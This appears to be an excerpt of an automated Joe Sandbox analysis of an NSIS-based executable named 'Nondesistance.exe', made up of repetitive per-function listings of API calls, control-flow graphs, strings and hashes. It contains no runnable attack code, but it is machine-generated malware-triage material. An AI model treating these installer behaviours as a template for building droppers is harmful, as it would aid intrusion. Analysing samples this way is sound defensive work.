                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp$C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll$C:\Users\user\dewater\reinsmen$Call
                                                                                                  • API String ID: 1941528284-760837157
                                                                                                  • Opcode ID: 15d2f7a3a720f2eeb803b4a2e8554c60f37bc1556a950feb26ebf7cc8684f7ef
                                                                                                  • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                  • Opcode Fuzzy Hash: 15d2f7a3a720f2eeb803b4a2e8554c60f37bc1556a950feb26ebf7cc8684f7ef
                                                                                                  • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                                                                  Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 821 402e9f-402eb3 822 402eb5 821->822 823 402ebc-402ec5 821->823 822->823 824 402ec7 823->824 825 402ece-402ed3 823->825 824->825 826 402ee3-402ef0 call 4030b1 825->826 827 402ed5-402ede call 4030c7 825->827 831 402ef6-402efa 826->831 832 40309f 826->832 827->826 833 402f00-402f49 GetTickCount 831->833 834 40304a-40304c 831->834 835 4030a1-4030a2 832->835 838 4030a7 833->838 839 402f4f-402f57 833->839 836 40308c-40308f 834->836 837 40304e-403051 834->837 840 4030aa-4030ae 835->840 841 403091 836->841 842 403094-40309d call 4030b1 836->842 837->838 843 403053 837->843 838->840 844 402f59 839->844 845 402f5c-402f6a call 4030b1 839->845 841->842 842->832 854 4030a4 842->854 847 403056-40305c 843->847 844->845 845->832 853 402f70-402f79 845->853 850 403060-40306e call 4030b1 847->850 851 40305e 847->851 850->832 859 403070-40307c call 405a49 850->859 851->850 856 402f7f-402f9f call 4061ab 853->856 854->838 863 403042-403044 856->863 864 402fa5-402fb8 GetTickCount 856->864 865 403046-403048 859->865 866 40307e-403088 859->866 863->835 867 402fba-402fc2 864->867 868 402ffd-402fff 864->868 865->835 866->847 869 40308a 866->869 870 402fc4-402fc8 867->870 871 402fca-402ff5 MulDiv wsprintfA call 404f48 867->871 872 403001-403005 868->872 873 403036-40303a 868->873 869->838 870->868 870->871 879 402ffa 871->879 876 403007-40300e call 405a49 872->876 877 40301c-403027 872->877 873->839 874 403040 873->874 874->838 882 403013-403015 876->882 878 40302a-40302e 877->878 878->856 881 403034 878->881 879->868 881->838 882->865 883 403017-40301a 882->883 883->878
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$wsprintf
                                                                                                  • String ID: DA$ DA$... %d%%$;]A
                                                                                                  • API String ID: 551687249-787801786
                                                                                                  • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                                  • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                  • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                                  • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                                                                  Function 00404F48 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 884 404f48-404f5d 885 405013-405017 884->885 886 404f63-404f75 884->886 887 404f80-404f8c lstrlenA 886->887 888 404f77-404f7b call 405d51 886->888 890 404fa9-404fad 887->890 891 404f8e-404f9e lstrlenA 887->891 888->887 893 404fbc-404fc0 890->893 894 404faf-404fb6 SetWindowTextA 890->894 891->885 892 404fa0-404fa4 lstrcatA 891->892 892->890 895 404fc2-405004 SendMessageA * 3 893->895 896 405006-405008 893->896 894->893 895->896 896->885 897 40500a-40500d 896->897 897->885
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                  • lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll
                                                                                                  • API String ID: 2531174081-3123401024
                                                                                                  • Opcode ID: 8631652a5c26d775c5f5b87e073b94c67094b482377ae5d2493a18bd051b8853
                                                                                                  • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                                  • Opcode Fuzzy Hash: 8631652a5c26d775c5f5b87e073b94c67094b482377ae5d2493a18bd051b8853
                                                                                                  • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                                  Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 898 40540e-405459 CreateDirectoryA 899 40545b-40545d 898->899 900 40545f-40546c GetLastError 898->900 901 405486-405488 899->901 900->901 902 40546e-405482 SetFileSecurityA 900->902 902->899 903 405484 GetLastError 902->903 903->901
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                  • GetLastError.KERNEL32 ref: 00405465
                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                  • GetLastError.KERNEL32 ref: 00405484
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                  • API String ID: 3449924974-2972653373
                                                                                                  • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                  • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                                  • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                  • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                                                                  Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 904 40605a-40607a GetSystemDirectoryA 905 40607c 904->905 906 40607e-406080 904->906 905->906 907 406090-406092 906->907 908 406082-40608a 906->908 910 406093-4060c5 wsprintfA LoadLibraryExA 907->910 908->907 909 40608c-40608e 908->909 909->910
                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                  • wsprintfA.USER32 ref: 004060AA
                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                  • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                  • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                  • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                  • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                                                                  Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 911 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 918 4023b0-4023b8 911->918 919 4028cf-4028de 911->919 921 4023c8-4023cb 918->921 922 4023ba-4023c7 call 402a3a lstrlenA 918->922 924 4023db-4023de 921->924 925 4023cd-4023da call 402a1d 921->925 922->921 929 4023e0-4023ea call 402e9f 924->929 930 4023ef-402403 RegSetValueExA 924->930 925->924 929->930 933 402405 930->933 934 402408-4024de RegCloseKey 930->934 933->934 934->919 936 4026a6-4026ad 934->936 936->919
                                                                                                  APIs
                                                                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp
                                                                                                  • API String ID: 1356686001-2523970413
                                                                                                  • Opcode ID: bec7360159c54444a62ffc30349932fb56a3d9b0bfa04e93961a420dff7a5997
                                                                                                  • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                  • Opcode Fuzzy Hash: bec7360159c54444a62ffc30349932fb56a3d9b0bfa04e93961a420dff7a5997
                                                                                                  • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                                  Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 937 4059d1-4059db 938 4059dc-405a07 GetTickCount GetTempFileNameA 937->938 939 405a16-405a18 938->939 940 405a09-405a0b 938->940 942 405a10-405a13 939->942 940->938 941 405a0d 940->941 941->942
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Nondesistance.exe", xrefs: 004059D1
                                                                                                  • nsa, xrefs: 004059DC
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                  • API String ID: 1716503409-1893205338
                                                                                                  • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                  • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                  • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                  • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                                                                  Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 943 402a7a-402aa3 RegOpenKeyExA 944 402aa5-402ab0 943->944 945 402b0e-402b12 943->945 946 402acb-402adb RegEnumKeyA 944->946 947 402ab2-402ab5 946->947 948 402add-402aef RegCloseKey call 4060c8 946->948 949 402b02-402b05 RegCloseKey 947->949 950 402ab7-402ac9 call 402a7a 947->950 956 402af1-402b00 948->956 957 402b15-402b1b 948->957 954 402b0b-402b0d 949->954 950->946 950->948 954->945 956->945 957->954 958 402b1d-402b2b RegDeleteKeyA 957->958 958->954 959 402b2d 958->959 959->945
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1912718029-0
                                                                                                  • Opcode ID: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                                                                  • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                  • Opcode Fuzzy Hash: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                                                                  • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                  Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                    • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                    • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                    • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                  • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                  • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                  • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                  • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                                  Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
